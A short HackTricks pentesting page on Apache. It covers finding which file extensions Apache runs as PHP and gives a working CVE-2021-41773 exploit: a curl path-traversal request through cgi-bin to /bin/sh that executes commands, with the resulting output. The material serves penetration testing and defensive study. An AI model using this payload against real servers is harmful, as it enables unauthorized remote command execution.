hacktricks/network-services-pentesting/pentesting-web/apache.md
Carlos Polop d15c2e37d1 arte
2024-01-08 12:25:09 +01:00

2.8 KiB

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Executable PHP extensions

Check which extensions is executing the Apache server. To search them you can execute:

 grep -R -B1 "httpd-php" /etc/apache2

Also, some places where you can find this configuration is:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: